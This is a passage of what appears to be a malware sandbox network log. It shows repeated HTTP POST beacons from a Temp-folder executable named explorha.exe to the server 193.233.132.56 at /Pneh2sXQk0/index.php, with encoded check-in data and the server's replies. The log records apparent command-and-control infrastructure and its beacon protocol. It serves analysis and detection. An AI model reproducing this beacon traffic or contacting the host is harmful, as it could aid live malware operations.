                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:35.709454060 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:35 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    39192.168.2.449775193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:36.066735983 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:36.315598965 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:36 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:36.316288948 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:36.570569992 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:36 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    40192.168.2.449776193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:37.712682962 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:37.957173109 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:37 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:37.957972050 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:38.209005117 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:38 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    41192.168.2.449777193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:38.615402937 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:38.863049030 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:38 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:38.863713980 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:39.115093946 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:38 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    42192.168.2.449778193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:39.468272924 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:39.713409901 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:39 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:39.714193106 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:39.963736057 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:39 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    43192.168.2.449779193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:40.314527035 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:40.562366009 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:40 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:40.563909054 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:40.816369057 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:40 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    44192.168.2.449780193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:41.169487000 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:41.413405895 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:41 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:41.414042950 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:41.663165092 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:41 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    45192.168.2.449781193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:42.013973951 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:42.257725000 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:42 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:42.258369923 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:42.507534027 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:42 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    46192.168.2.449782193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:42.851830006 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:43.090806007 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:42 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:43.091510057 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:43.336544991 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:43 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    47192.168.2.449783193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:43.685111046 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:43.928663015 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:43 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:43.929373980 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:44.177284002 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:44 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    48192.168.2.449784193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:44.538659096 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:44.790668011 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:44 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:44.791507959 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:45.047224045 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:44 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    49192.168.2.449785193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
